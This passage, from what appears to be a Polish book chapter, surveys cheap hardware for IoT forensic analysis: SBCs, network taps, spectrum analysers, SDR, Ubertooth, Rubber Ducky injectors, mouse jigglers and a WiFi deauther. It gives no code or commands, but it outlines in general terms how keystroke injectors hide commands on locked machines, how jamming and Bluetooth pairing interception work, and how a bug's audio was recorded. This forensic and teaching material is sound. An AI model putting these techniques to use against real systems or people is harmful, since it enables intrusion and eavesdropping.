radiowych, SDR
Summary
This chapter has several goals to achieve. The first very important one is to recognize the
potential and risks associated with the IoT world and the technologies applicable to it. IoT
devices can play the role of both victim and attacker. They can also play an important
evidentiary role. IoT technology has forced down the price of equipment and greatly
increased its market availability. Another problem was that in many cases investigations
were abandoned because the equipment, necessary for analysis, was beyond the economic
reach of the average customer. I hope we can convince you that a lot can be achieved even
with a low budget.
Keywords: IoT, (Internet of Things), hacking, forensic analysis, radio transmission
analysis, SDR
Wstęp Sprzęt i oprogramowanie, o którym mowa w tym wykładzie, mogą zostać
użyte do ataku, mogą stać się ofiarą i/lub mogą zawierać użyteczne dowody pomagające
nam rozwiązać zagadkę.
Komputery jednopłytkowe (SBC) są małe i (nie)drogie, jednak ceny
przed kryzysem i teraz dramatycznie się zmieniły. SBC to nie tylko Raspberry Pi czy
ogólnie rozwiązania oparte na ARM, ale są też projekty oparte na architekturze Intela.
RISC-V to stosunkowo nowa rzecz oparta na otwartym standardzie. W przeciwieństwie
do procesorów ARM jest wolny od licencji.
Mikrokontrolery rozwijają się bardzo szybko, umożliwiając szeroki
zakres nowych zastosowań. Mają znacznie mniejszą moc obliczeniową, ale w wielu
155
przypadkach jest ona zupełnie wystarczająca. Głównie to kontrolery stają się sercem
urządzeń IoT. Jak zwykle, rozwój ten może prowadzić do wielu przydatnych
zastosowań, ale może być również niewłaściwie wykorzystany do złośliwych celów. W
dalszym ciągu skupimy się na aplikacjach, które mogą pomóc lub wręcz umożliwić
proces pozyskiwania dowodów. Zastosowanie dedykowanych rozwiązań pozwala na
większą elastyczność przy zachowaniu stosunkowo niskich kosztów operacyjnych.
Dysponujemy dużą bazą przydatnych projektów, lecz ich realizacja nie
jest łatwa, nie tylko ze względu na błędy w oprogramowaniu, ale także w sprzęcie.
Możecie Państwo zapytać czemu w tym wystąpieniu jest tak mało o
samym WiFi. Pierwszy powód jest prosty, bo na temat WiFi wylano już morze atramentu.
Druga rzecz poważniejsza to ograniczenia sprzętowe. Maksymalna prędkość
próbkowania dla HackRF One to 20 MHz. Można znaleźć w sieci opis analizy sygnałów
WiFi przez Gnu Radio, ale z wykorzystaniem znacznie potężniejszego sprzętu. Wchodzą
tu czynniki takie jak szerokość kanału do 160MHz a także skomplikowane modulacje
takie jak 1024-QAM. Nie wspomnę tu o kluczowej dla przepustowości technologii
MIMO (ang. „Multilple Input Multiple Output). Analiza spektrum prowadzona za
pomocą urządzeń przedstawionych przez nas rozwiązuje wiele problemów napotykanych
w sieciach WiFi, przy akceptowalnych kosztach.
Nie podajemy cen stosowanych produktów, bo ich dostępność rynkowa
bardzo się zmienia. Powoduje to znaczne skoki ceny. Stoi za tym kryzys, inflacja jak
również błędne założenia dotyczące zapotrzebowania rynku w stosunku do możliwości
produkcyjnych, tak jak to ma w przypadku produktów Raspberry.
Środowisko pracy
Zwyczajowo przyjmujemy milcząco, że stanowisko pracy/badania jest
właściwie przygotowane. W literaturze amerykańskiej poświęconej informatyce śledczej
spory nacisk kładzie się na właściwe przygotowanie stacji roboczej do jej prowadzenia.
Jest to jeden z pierwszych elementów łańcucha dowodowego.
Teoretycznie możemy zarówno posługiwać się systemem Windows,
MacOS czy Linux. Problem jednak polega na tym, że w przypadku specyficznych
wymagań, w systemach Windows i MacOS, konieczne jest zastosowanie komercyjnych
pakietów oprogramowania. Z reguły oprogramowanie to jest niszowe, a co za tym idzie,
po prostu drogie. W chwili obecnej pojawiają się również produkty licencjonowane na
zasadzie subskrypcji, a co za tym idzie oprogramowanie może przestać działać po
określonym czasie lub po wykonaniu określonej liczby operacji. Podnosi to znacząco
koszty analizy śledczej. Co ciekawe to ten sam sprzęt często ma ograniczoną
funkcjonalność w systemach komercyjnych. Na przykład karty radiowe nie pozwalają na
wprowadzenie ich w stan zwany po angielsku „monitor mode” pozwalający na zbieranie
pakietów radiowych ich nagłówkami, choć dla ciekawości oprogramowanie komercyjne
oferuje sterowniki pozwalające na skonfigurowanie tej funkcjonalności. Często
producenci uzasadniają to niestabilnością działania niektórych trybów w systemach
komercyjnych, choć nie jest to regułą.
Z pomocą przychodzi nam Linux ze wszystkimi swoimi wadami i
zaletami. Niewątpliwą wadą systemów Linux jest ich różnorodność a tym samym kłopot
prawidłowej konfiguracji systemów. Problemem jest również certyfikacja
oprogramowania wykorzystywanego do analizy śledczej a raczej jej brak. Dużym
problemem jest również stabilność systemów opartych o jądro Linuksa. Nie wszystkie
156
produkty mają szybkie wsparcie w Linuksie. W przypadku kart radiowych jest to
specjalnie bolesny problem. Karty umożliwiające pracę w kolejnych wersjach
protokołów radiowych trafiają do Linuksa z dużym opóźnieniem. Głównym problemem
wydaje się jednak brak certyfikacji oprogramowania.
Z drugiej strony oprogramowanie wolne od opłat rozwija się za bardzo
dynamicznie i oferuje często funkcjonalności, która nie są wspierane poprzez produkty
komercyjne. Powstają również specjalizowane dystrybucje zawierające oprogramowanie
do analizy sieci, testów penetracyjnych czy też analizy śledczej...
Jako alternatywa pozostaje nam korzystanie z wielu systemów, aby
optymalnie wykorzystać nasze zasoby oprogramowania i sprzętowe. Korzystanie z wielu
platform specjalnie w pracach terenowych jest wygodne. Zauważmy jednak, że
większość urządzeń stosowanych w naszych pracach badawczych jest podłączana
poprzez interfejs USB. W chwili obecnej popularne wirtualizatory bardzo obsługują
sprawnie urządzenia podpinane do hosta, na którym działa wirtualizator.
W naszej pracy posłużyliśmy się zarówno oprogramowaniem pracującym
pod systemem operacyjnym Linux, MacOS jak i Windows. Ciekawą opcją wydaje się
również wykorzystanie maszyn wirtualnych. Przeprowadziliśmy testy zarówno na
systemie MacOS z wirtualizatorem Parrallels, jak i Windows z opcją Windows Subsystem
Linux (WSL) z Kali Linux na pokładzie. O ile w przypadku MacOS i Parrallels w
zasadzie nie napotykaliśmy problemów do czasu prób aktualizacji jądra systemowego, o
tyle prace nad zastosowaniem WSL były znacznie bardziej czasochłonne. Z nieznanych
przyczyn WSL nie obsługuje kart radiowych ani bluetooth - brak ich wsparcia w jądrze.
W naszym projekcie konieczna była więc kompilacja jądra. Może to stanowić pewną
zaporę dla osób, które nie mają doświadczenia z systemem Linux. W obu przypadkach
bardzo ważną rzeczą jest utworzenie kopii zapasowej przed instalacją uaktualnień. W
trakcie naszych prac Parrallels po instalacji nowego kernela powodował „crash” kernela
do momentu wgrania nowych uaktualnień wirtualizatora. W przypadku Windows WSL
sprawa była bardziej skomplikowana. WSL został uszkodzony przez kolejną poprawkę
Windows 11. Walka była nierówna – dopiero kolejne uaktualnienie Microsoft WSL
rozwiązało problemy. Pamiętajmy, że nowe jest często wrogiem dobrego. Testujmy
oprogramowanie przed rozpoczęciem prac!
Komputery SBC i kontrolery
Komputery jednopłytkowe zwane w skrócie SBC (ang. „Single Board
Computers”) oferują różnorodne systemy operacyjne – od różnych odmian Linuksa po
Windows. Mogą być używane jako narzędzia ataku, kontrolery/sniffery, ale także same
mogą paść ofiarą ataku. Ich moc obliczeniowa zależy od sprzętu – Raspberry Pi 4B/5 z 8
GB na pokładzie to naprawdę potężny komputer przydatny do różnych zastosowań.
Rysunek 1 pokazuje najbardziej popularne komputery jednopłytkowe
serii Raspberry i popularne kontrolery takie ESP32 i Maxim z programatorem. Małe
meandrowate struktury widoczne na płytkach to anteny Bluetooth i WiFi. Mniejsze
modele Raspberry to Pi Zero W i Pi Zero 2W. Jeden z SBC został wyposażony na stałe w
interfejs USB. Umożliwia on zasilanie komputera z USB, a sam port USB instaluje się
jako port ethernetowy. Pozwala to na wykorzystanie urządzenia poprzez sieć – nie tylko
poprzez protokół SSH, ale również wspierany jest protokół RDP.
157
Rysunek 16 Komputery jednopłytkowe i kontrolery
Nie wszystkie modele można zasilać z powerbanków, a jest to potrzebne,
aby zapewnić im mobliność. Raspberry Pi5 dostępne jeszcze tylko dla szczęśliwców to
dobry przykład na to, że mamy do dyspozycji dużą moc obliczeniową, ale jest naprawdę
„prądożerny” bo wymaga zasilacza 5A. Nietrywialną kwestią jest również chłodzenie
układu. Warto tu również wspomnieć o układach FPGA jako o bardzo ciekawych
rozwiązaniach. Nie zajmowaliśmy się tym w czasie naszych prac, bo rozwiązania te są
znacznie droższe.
W przypadku egzotycznego zasilania można zastosować przetwornice
napięcia. Ten sposób rozwiązałem zasilanie punktu dostępowego PineApple. Napięcie z
banku energii podbiłem przetwornicą do 12V, oczywiście kosztem zwiększenia prądu
zasilania. Koszty przetwornicy i kabli są znikome.
Mikrokontrolery są znacznie bardziej ograniczone – dedykowane
aplikacje ze względu na ograniczenia pamięci, procesora i prędkości interfejsów. O ile w
komputerach SBC z reguły mamy do czynienia z wielofunkcyjnym systemem
operacyjnym, o tyle w kontrolerach koncentrujemy się głównie na zapewnieniu
konkretnej funkcjonalności. Procesory są wolniejsze, mniejsza pamięć i dostępnych
peryferiów. Za to ich cena, niski poziom zasilania powodują, że stają się sercem urządzeń
IoT. W chwili obecnej według naszej opinii jest problem oferowanego
standardu interfejsów radiowych. Tylko nieliczne urządzenia takie jak ESP32-C6 oferują
wsparcie dla 802.11ax (WiFi 6). Warto rozwijając nowe projekty patrzeć na ten aspekt
gdyż mamy już WiFi 6e a WiFi 7 puka do drzwi.
Sieci przewodowe
Analiza sieci przewodowych wymaga możliwości podłączenia się do
sieci, jak i podsłuchiwania ruchu, czyli tak zwanego „snifowania”. W czasie prac
prowadzonych u klienta wielokrotnie natrafiałem na problem zapewnienia sobie dostępu
do sieci. Specjalnie w serwerowniach jest to duży problem. Warto więc mieć na swoim
wyposażeniu mały przełącznik, który zapewni nam możliwość podpięcia się do
istniejącej sieci. Optymalnym rozwiązaniem jest również możliwość zasilania takiego
przełącznika z różnych źródeł zasilania na przykład: zasilacza sieciowego, interfejsu USB
lub portu PoE. Rozwiązaniem, które wypróbowaliśmy w praktyce jest 5-cio portowy
przełącznik Ubiquiti Flex Mini. Może być zasilany poprzez USB-C, PoE lub załączony
zasilacz. Umożliwia on również zarządzanie za pomocą aplikacji. W szczególności
przydatną opcją jest możliwość skonfigurowania funkcjonalności „port mirroring”
przydatnej w czasie analizy ruchu. Nie oferuje niestety konfiguracji sieci VLAN.
158
Rysunek 17 Przełącznik Ubiqity Flex mini
Wypróbowaliśmy również w praktyce 5-cio i 8-mio portowe przełączniki
Netgear z opcją Smart Management – GS108E, GS108PE, GS305E... Zarządzane są
poprzez interfejs webowy lub aplikację. Oferują zarówno możliwość skonfigurowania
„port mirroring”, jak i sieci VLAN. Niestety oferują możliwość zasilania tylko poprzez
dedykowany zasilacz. Posiadają również ciekawą opcję optymalizacji poboru mocy
poprzez obniżanie poziomu zasilania niewykorzystanych portów. Istnieje więc szansa na
to, aby modele 5-cio portowe zasilać z portu USB poprzez odpowiedni kabel.
Rysunek 18 Ninja Throwing Star Tap i przełącznik Netgear
Jeśli chodzi o urządzenia pasywne można do analizy ruchu wykorzystać
również tak zwane urządzenia zwane „tap”. Tap, taki jak projekt „Throwing Star”
degeneruje jednak przepustowość do 100Mbps. Projekt ten jest o tyle ciekawy, że można
kupić albo gotowy projekt, albo skorzystać z planów jego budowy.
Analiza spektrum
Interfejsy radiowe WiFi widzą i odbierają tylko sygnały 802.11. Oznacza
to, że BT, protokoły specyficzne dla dostawcy, Zigbee, Z-wawe czy zakłócenia nigdy nie
zostaną zaobserwowane na interfejsach 802.11. Pośrednio będą widoczne na przykład
jako wysoki poziom błędów w Wi-Fi przy współdzieleniu tej samej częstotliwości RF.
Karty radiowe WiFi Intela oferują specjalną funkcjonalność – karta radiowa omija przy
stosowaniu BT przestrzeń zajętą przez sieć WiFi.
Na rysunku 4 widzimy w kolejności:
• prosty analizator spektrum 2.4 GHz,
• interfejs DVB-T ze specjalnym chipsetem pozwalający na analizę spektrum do
1.8-1.9 GHz i częstością próbkowania około 2MHz
• profesjonalny analizator spektrum dla WiFi 2.4 i 5 GHz
• urządzenie HackRF One pozwalające na pracę do 6 GHz, 8bit/próbkę i częstość
próbkowania do 20MHz
159
Rysunek 19 Analizatory spektrum i urządzenia SDR
Urządzenia DVB-T i HackRF One są wspierane przez projekty SDR
pozwalające na digitalizacje, składowanie i analizę rejestrowanych sygnałów. Warto
zwrócić uwagę na metalową obudowę HackRF One. Wszędzie tam, gdzie potrzebujemy
wytrzymałości mechanicznej, ale również ochrony przed zakłóceniami warto stosować
metalowe obudowy. Warto również stosować dławiki ferrytowe na przewodach
zasilających. Interfejsy USB 3.x potrafią całkiem konkretnie zakłócać pomiary na
podłączanych bezpośrednio do nich urządzeniach.
Można również efektywnie zakłócać transmisje radiowe. Zagłuszanie
sygnału radiowego jest rzeczą, która musi być bezwzględnie wykryta i zdiagnozowana.
Do tego celu nie wykorzystuje się sieci WiFi ale, na przykład brutalnie nadaje się przebieg
piłokształtny na częstotliwości którą zagłuszamy. Pamiętajmy również, że nie wolno
zakłócać cudzych transmisji radiowych – uprawnione do tego są tylko uprawnione służby.
Internet rzeczy (IoT) niekoniecznie wymaga dużych prędkości
przesyłania danych – protokoły nie zapewniają wysokich prędkości transmisji, ale
powinny oszczędzać baterie. Wyciek informacji może być dla nas praktycznie
niewidoczny – mała ilość danych w długiej skali czasowej może prowadzić do wycieku
dużych objętości danych. Mając do czynienia z nieznanymi protokołami, analizatory
widma są naszą ostateczną bronią.
Dobrym przykładem są również urządzenia podsłuchowe – czasami nie
znamy szczegółów protokołu, ale sygnał radiowy przez nie generowany może zostać
wykryty. Pytanie o to, co dzieje się w przestrzeni radiowej, jest również ważne, gdy
przypomnimy sobie rosyjskie urządzenia podsłuchowe zasilane zewnętrzną
częstotliwością radiową.
160
Rysunek 20 Rosyjskie urządzenie podsłuchowe zasilane radiowo
Kolejne rysunki 6 do 8 przedstawiają wyniki działania analizatorów
spektrum. Pierwszy z serii rysunek pokazuje działanie prostego analizatora spektrum
WiSpy w paśmie 2.4 GHz. Widać dość wyraźnie transmisję WiFi na kanale 2 –
trapezoidalny kształt na środkowym wykresie. Na dolnym wykresie widać pracę
Bluetooth. Kolejny rysunek pokazuje nam problem z zakłóceniami. Duża widoczna
struktura po prawej stronie to efekt działania kamery bezprzewodowej pracującej z
własnym protokołem. Punkty dostępu radiowego pechowo ustawione w tym miejscu na
kanał 11 nie działały. Karta WiFi nie pokazywała nic, bo nie mogła się podłączyć do
punktu dostępu. Tylko analiza spektrum przyszła nam z pomocą. Ostatni w rysunków
pokazuje pełne spektrum radiowe do 6 GHz mierzone przez HackRF One. To dobry punkt
startowy do analizy wszędzie tam, gdzie mamy pionowe linie mamy do czynienia z ciągłą
transmisją danych. Warto w okolicach występowania pionowych linii zrobić
dokładniejszą analizę spektrum.
Rysunek 21 WiSpy 2.4 GHz w akcji
161
Rysunek 22 WiSpy DBX - widoczny silny sygnał kamery nadzoru pracującej poza standardem WiFi
Rysunek 23 Wyniki analizy spektrum w pełnym zakresie HackRF One
Mamy nadzieję, że po przeczytaniu tego rozdziału zdacie sobie Państwo
z problemu, że bez analizy widma, nie wiemy co się dzieje w naszej przestrzeni radiowej.
Software Defined Radio
Radio definiowane programowo (SDR) to system komunikacji radiowej,
w którym komponenty tradycyjnie implementowane w sprzęcie analogowym, są
implementowane za pomocą oprogramowania na komputerze osobistym lub systemie
wbudowanym. Sprzęt taki jak „HackRF One” czy po prostu klucze sprzętowe DVB-T z
układem RTL2832U Realtek pozwalają nam wyjść poza standardową analizę widma.
162
Umożliwiają również nagrywanie, składowanie i w końcu dekodowanie transmisji
radiowych. Przykład tego znajdziecie Państwo na rysunku 9. Sygnał radiowy z urządzenia
podsłuchowego został zdekodowany i nagrany poprzez oprogramowanie SDR. W
przypadku tego urządzenia podsłuchowego korzysta ono ze standardowej modulacji
takiej jaką znamy z radia FM. Skąd taką informację zdobyć? Tu sprawa była prosta
wystarczyła wizyta na stronie firmy oferującej sprzęt dla detektywów. Generalnie jednak
nie jest to takie proste i wymaga procesu badawczego.
Koncepcja SDR jest bardzo poważnie traktowana przez wojsko. Część
nadawczo/odbiorcza jest realizowana przez sprzęt, możemy natomiast całkowicie
zmienić to, co robi radio, wymieniając oprogramowanie. W chwili obecnej
kompromitacja systemu łączności wojskowej powoduje konieczność wymiany
skompromitowanych urządzeń, a więc całkowity paraliż łączności. W przypadku sprzętu
radiowego wykorzystującemu SDR musimy jedynie wymienić oprogramowanie.
Rysunek 24 Urządzenie podsłuchowe widoczne na analizatorze spektrum
Praktyczny przykład zastosowania SDR pokazany jest na rysunku 9 obok.
Skąd znaleźć częstotliwość pracy – najprościej ze strony producentów. Jeśli nie możemy
jej stamtąd pozyskać pozostaje nam analiza spektrum. Wykorzystaliśmy do tego celu
telefon komórkowy z systemem Android i oprogramowaniem RFAnalizer. Niezależnie ze
strony producenta dowiedzieliśmy się, że urządzenie wykorzystuje modulację FM.
Pozwoliło to nam również na nagranie głosu. Zrobiliśmy to zarówno przez
oprogramowanie Gnu Radio, jak i przez standardowe oprogramowanie CubeSDR
Anteny Zacznijmy od rzeczy najważniejszej. Częstotliwości radiowe są
traktowane jako dobra rzadkie wymagające specjalnej ochrony. Organizacje
międzynarodowe takie jak „International Telecommunication Union” (ITU) zajmują się
koordynacją przydziału częstotliwości i dopuszczalnej mocy urządzeń wykorzystujących
je. Przesyłając dane, jesteśmy ograniczeni limitami mocy wypromieniowanej dla danej
częstotliwości narzuconymi przez regulatora, jakim w przypadku Polski jest Urząd
Komunikacji Elektronicznej (UKE). Odbierając dane musimy pamiętać o tym, że musimy
osiągnąć poziom mocy sygnału powyżej progu czułości odbiornika z odpowiednim
zapasem. Równocześnie musimy pamiętać, że zbyt duży sygnał antenowy może
prowadzić do problemów z jego odbiorem, lub nawet uszkodzenia odbiornika.
163
Ogólnie rzecz biorąc, dodając anteny zewnętrzne, możemy zmienić
właściwości kierunkowe, zwiększyć stosunek sygnału do szumu itp. Ogólna zasada jest
taka, że do pracy należy używać anten o większym zysku, a nie wzmacniaczy.
Wzmacniacze zwiększają siłę odbieranego sygnału, ale jednocześnie zmniejszają
stosunek sygnału do szumu, dodając własny szum wzmacniacza. Antena o większym
zysku to lepszy stosunek sygnału do szumu, który ma pierwszorzędne znaczenie dla
odbioru sygnału. Zgodnie z twierdzeniem Shanona-Hartleya to stosunek sygnału do
szumu S/N w skali liniowej ma kluczowe znaczenie dla pojemności kanału:
C =W Blog2(1+S/N)
gdzie: W to szerokość pasma w Hz a C przepustowość kanału w bitach na sekundę.
Rysunek 25 Antena szerokopasmowa, wąskopasmowa kierunkowa i dookólna
Zazwyczaj anteny są jednopasmowe, ale są również anteny
szerokopasmowe pokrywające szerokie spektrum – dobre przy wyszukiwaniu nieznanego
sygnału. Złącza antenowe to osobny problem. Istnieje bardzo wiele standardów złącz
antenowych wymuszanych często przez wymiary sprzętu czy też uniwersalnie przyjęte
standardy styków. Problemy z różnymi złączami można rozwiązać za pomocą „pigtail”i
lub konwerterów. Należy jednak pamiętać, każde złącze wprowadza tłumienie co może
powodować problemy z działaniem serwisu. Niestety, mikrokontrolery zwykle oferują
tylko wbudowane anteny PCB o charakterystyce dookólnej i słabym współczynniku
wzmocnienia. Często działania producentów mają podstawy prewencyjne. Ponieważ
pasmo 5GHz jest wykorzystywane wciąż do innych celów z reguły urządzenia 5GHz
mają anteny niewymienne.
Na szczęście lub nieszczęście, nie ma limitu zasięgu propagacji fal
radiowych. Jeszcze raz uwaga, należy zachować ostrożność, zwłaszcza podczas pracy w
pobliżu lotnisk lub instalacji państwowych. Przekroczenie dopuszczalnej mocy
wyemitowanej z anteny może mieć poważne konsekwencje, w tym te przewidziane przez
prawo karne!
Legendarny „Rubber Ducky”
Zarówno Windows jak i Linux po podłączeniu urządzenia do interfejsu
USB usiłują go uruchomić wykorzystując posiadane sterowniki. Proces ten jest
aktywowany również, gdy włączony jest wygaszacz ekranu i blokada klawiatury. Można
164
to wykorzystać podłączając do komputera ofiary urządzenia, które wyglądają jak
niewinny pendrive, ale potrafią wyrządzić wiele szkód. Instalują się jako interfejs
sieciowy lub klawiatura. Klawiatura ta może być wykorzystana do wpisania z dużą
prędkością przygotowanych komend nawet gdy klawiatura jest zablokowana.
„Rubber Ducky” emuluje klawiaturę podłączoną przez USB,
umożliwiając wykonanie przygotowanych skryptów. Nazwa Rubber Ducky pochodzi od
symbolu żółtej kaczuszki, tak jak widać to na rysunku 11, mającego utwierdzić ofiary w
niewinności tego urządzenia. Najczęściej otwierany jest terminal, gdzie komendy
wpisywane są w kolorze żółtym na białym tle, aby ukryć działanie „exploita”. Istnieje
spora biblioteka przydatnych skryptów na stronie producenta.
Rysunek 26 WiFi Ducky, DigiSpark i komercyjna wersja Rubber Ducky
Inne rozwiązania takie jak „Poison Tab” autorstwa Samy Kamkara
emulują interfejs sieciowy. WiFi Ducky jest widoczny jako punkt dostępu radiowego.
Umożliwia to zdalne wstrzykiwanie skryptów przez Wi-Fi za pośrednictwem interfejsu
webowego. Ciekawą alternatywą dostępną dla kontrolerów DigiSpark jest możliwość
konwersji skryptów „Rubber Ducky” do kodu. istnieją programy/strony internetowe
umożliwiające wprost konwersję skryptów „Rubber Ducky” na kod wykonywalny. Wadą
niewątpliwą tego rozwiązania jest to, że nie ma zapisywalnej pamięci masowej, ale poczta
lub chmura mogą być dostępne...
Ceny oryginalnego rozwiązania wahają się obecnie w granicach
kilkudziesięciu dolarów za sztukę. Cena WiFi Ducky zależy od tego czy je sami budujemy
czy kupujemy gotowe urządzenie. Koszt DigiSpark to obecnie około 25 PLN.
Snifowanie sieci Bluetooth
Nie jest to łatwe zadanie ze względu na technologię widma
rozproszonego z przeskakiwaniem częstotliwości (FHSS), jak można naiwnie się
spodziewać. Profesjonalne rozwiązania zaczynają się od 1000 USD. Urządzenie powstało
z inicjatywy Michaela Ossmanna, której celem było zbudowanie urządzenia „UberTooth
One” będącego rozsądną alternatywą cenową. Wireshark nie wspiera wprost „Ubertooth
One”, ale pozwala na wygodne podłączenie urządzenia poprzez mechanizm „named pipe”
na systemach Linux. Można również podążać za skokami częstotliwości wybranego
urządzenia i zbierać z niego dane. Bluetooth oferuje możliwość zabezpieczania
kryptograficznego transmisji danych. Nie wszystkie profile BT są jednak szyfrowane...
Dodatkowo, jeżeli potrafimy podsłuchać sesję na etapie procesu przyłączania urządzenia
to mamy szansę na złamanie szyfrowania.
165
Rysunek 27 Ubertooth One
W zestawie oferowana jest goła płytka drukowana z anteną. Warto
zainwestować w metalową obudowę z powodów nie tylko mechanicznych, ale również
innych, które wyjaśniła już prezentacja „HackRF One”. Urządzenie pokazane jest na
rysunku @@.
„Mouse Jiggler”
Urządzenia „Mouse Jiggler” czyli coś co wykonuje ruchu myszą bez
udziału użytkownika sprzedawane były od wielu lat. Początkowo sprzedawane jako Geek
Toy - urządzenie USB, które po podłączeniu komputera powodowało irytujące drgania
myszki na ekranie. Nadużywane nagminnie w czasie pandemii przez osoby pracujące
zdalnie do symulacji aktywności użytkownika. Co ciekawe niektórzy pracodawcy
wykrywali ich stosowanie i wyciągali konsekwencje wobec pracownika. Wyrafinowane
modele mogą być drogie, bo to mechaniczne zmotoryzowane konstrukcje wykorzystujące
aktualnie działające myszy.
Dla badacza prowadzącego analizę śledczą to narzędzie zapobiegające
aktywacji wygaszacza ekranu, a tym samym zaszyfrowania dysku. Jeśli drgania są
niewielkie rzędu 1 lub 2 pikseli wokół bieżącej pozycji myszy, to nadal możemy używać
myszy bez problemów podczas gdy wygaszacz ekranu jest zablokowany.
Rysunek 28 Mouse jiggler - komercyjny i zaprogramowany kontroler DigiSpark
Komercyjne rozwiązania to koszt ponad 100 PLN. Nasze rozwiązanie to
odpowiednio zaprogramowany kontroler Digispark ATTINY85. Dodatkowo mamy
możliwość dowolnego programowania ruchu myszy. Oczywiści nie mamy pięknej
obudowy, ale czy do analizy śledczej to potrzebne?
166
Protokoły radiowe IoT — nowe metody wycieku danych
Świat IoT jest wyjątkowy – w wielu przypadkach musimy
zminimalizować zużycie energii i/lub szybkość transmisji danych. Prosty przykład to
wyłącznik światła. Nie wysyłamy dużej objętości danych, nie potrzebujemy więc dużej
prędkości, ale wymagana jest duża trwałość baterii samego przełącznika.
Przykłady dedykowanych protokołów radiowych – to nie WiFi!
• Low Energy Bluetooth - BLE
• Zigbee
• Z-wave
• ESP-Now – bazowany na WiFi
• LoRa – specjalny protokół o znacznym zasięgu – nawet ponad 100km!
Nowe/stare:
• OpenThread by Google
• Matter
• MQTT
Najprościej definiuje je Wikipedia. Thread to protokół IoT, który
umożliwia komunikację urządzeniom na niewielkim obszarze. Promuje kompatybilność
na poziomie sieci. Matter to protokół/standard interoperacyjności, który wpływa na
sposób tworzenia aplikacji i sieci IoT. Promuje kompatybilność na poziomie sieci,
aplikacji i systemu.
Protokół MQTT to zgodnie z Wikipedią to uproszczony protokół
sieciowy typu "publikuj-subskrybuj" typu maszyna-maszyna. Jest on przeznaczony do
połączeń ze zdalnymi lokalizacjami, które mają urządzenia z ograniczeniami zasobów
lub ograniczoną przepustowością sieci, na przykład w Internecie rzeczy (IoT), czy za
łączem satelitarnym. Musi działać za pośrednictwem protokołu transportowego, który
zapewnia uporządkowane, bezstratne, dwukierunkowe połączenia — zazwyczaj jest to
TCP/IP.
Analiza śledcza urządzeń SBC i IoT
Celem analizy śledczej IoT jest zbieranie dowodów z urządzeń
elektronicznych, w tym urządzeń sieciowych, komputerów, inteligentnych i mobilnych
czujników i urządzeń, a także dronów i robotów. Obejmuje obszary analizy, takie jak
urządzenia, sieci, chmura i analityka w czasie rzeczywistym. Systemy IoT mogą
obejmować urządzenia u różnych dostawców chmury i w różnych lokalizacjach. Liczba
źródeł artefaktów w IoT jest znacznie szersza niż w tradycyjnej analizie
kryminalistycznej. Urządzenia IoT zwykle nie mają zegara czasu rzeczywistego. W
przypadku niezsynchronizowanych zegarów korelacja danych i tworzenie osi czasu może
być trudne lub niemożliwe.
Systemy IoT generują kolejne problemy z zarządzaniem danymi ze
względu na dużą ilość danych i często egzotyczne formaty danych oraz na ich
rozproszenie w chmurze. Urządzenia IoT zazwyczaj nie oferują opcji stałego
przechowywania danych oraz mogą mieć ograniczone zasilanie, które ogranicza czas
pracy analizowanego urządzenia. To czego możemy potencjalnie szukać może wyglądać
potencjalnie niewinnie jak na rysunku 14. Dla ułatwienia urządzenie ma wielkość pudełka
zapałek. Przedstawione urządzenie to tzw. „deauther” czyli urządzenie pozwalające na
odłączanie klientów WiFi od sieci bezprzewodowej. W najnowszych sieciach, gdzie
167
zarówno klient jak i punkt dostępu wspierają rozszerzenie standardu radiowego 802.11w
działać nie będzie. Uwaga to nie jest zagłuszacz sygnałów radiowych!
Rysunek 29 Urządzenie realizujące funkcję deautoryzacji sieci WiFi
IoT przynosi nowe źródła dowodów, rejestruje zdarzenia z otaczającego
nas środowiska, które wcześniej nie były rejestrowane. Warto zauważyć, że ze względu
na to, że dowody IoT znajdują się zazwyczaj w chmurze, znacznie trudniej jest je
zniszczyć/zanieczyścić. Ważny może być nawet najmniejszy czujnik, który przesyła
pojedynczą wartość pomiarową jednej wielkości fizycznej. Wszystko to dzieje się zwykle
bez żadnej interakcji z użytkownikiem, co jest efektem ubocznym IoT – użytkownicy
zazwyczaj nie są w stanie skonfigurować systemu. W sumie dane zebrane z systemów
IoT mogą być wykorzystane do zbudowania złożonego obrazu zdarzeń.
W przypadku komputerów jednopłytkowych typu Raspberry Pi mamy do
czynienia po prostu z kryminalistyką systemów Linux/Windows. Oczywiście można być
również zaskoczonym szyfrowaniem dysku – Linux teraz nie różni się w tym aspekcie
zbytnio od innych systemów, takich jak Mac czy Windows.
Problem zaczyna się jednak w przypadku kontrolerów. Rozwiązania takie
jak Arduino IDE, Maxim Mbed i podobne rozwiązania są zasadniczo kros-kompilatorami.
Obecnie istnieją dwa popularne standardy języków wykorzystywanych do
programowania IoT – C++ i Python/Micro Python. Nie ma również wspólnego standardu
CPU - najnowszy układ Expessif jest oparty na otwartym standardzie Risc-V, podczas
gdy inne są w większości oparte na architekturze ARM. Na szczęście wiele urządzeń
wspiera standard JTAG umożliwiający zrzut oprogramowania poprzez złącze seryjne.
Bardzo często spotykamy się z koniecznością stosowania metod i
narzędzi, które nie zostały jeszcze ustandaryzowane, co może budzić wątpliwości co do
zagwarantowania rzetelności i dopuszczalności w postępowaniu dowodowym w sądzie.
Dodatkowym problemem jest brak standaryzacji IoT, dlatego każde urządzenie to nowy
program badawczy – choć widoczne są pierwsze próby w tym kierunku. Obecnie
dostępne narzędzia z zakresu analizy śledczej IoT są ograniczone i często nie radzą sobie
ze złożoną infrastrukturą sieci i urządzeń IoT.
168
Podsumowanie
Świat IoT możliwy dzięki SBC i mikrokontrolerom to aktualna
rzeczywistość. W IoT istnieje problem, którego najwyraźniej nie dostrzegają dostawcy
IoT. Obecnie jesteśmy w 100% zależni od rozwiązań specyficznych dla dostawców z
wieloma niewiadomymi. Sieci WiFi wygrały dzięki standaryzacji. Dla nikogo nie jest
dziś dziwne, że karty radiowe współpracują z urządzeniami od różnych producentów. Nie
było to rzeczą oczywistą wtedy, kiedy po raz pierwszy opublikowano specyfikację
standardu 802.11. Coraz więcej urządzeń jest sprzedawanych w wersjach
kompatybilnych z rozwiązaniami wielu producentów. Praktycznie standardem jest
możliwość przyłączenia rozwiązań różnych producentów do Apple Home. Pojawiają się
bramki łączące różne światy IoT.
Dużą rolę w ostatnim czasie odgrywa pomysł Thread i Matter. Oba
protokoły mamy dają nadzieję na początek procesu standaryzacji. Apple Home akceptuje
już urządzenia je wspierające. Inni producenci na przykład Aquara wspierają wprost w/w
protokoły oraz wbudowują funkcjonalność mostka do Apple Home. Idą za tym inne
Firmy jak na przykład producent systemów inteligentnego domu Somfy. Niestety jak
twierdzą złośliwi, nazwy protokołów nie zostały szczęśliwie dobrane – wystarczy
poszukać w sieci…
Pamiętajmy, że IoT może być atakującym, narzędziem przestępstwa,
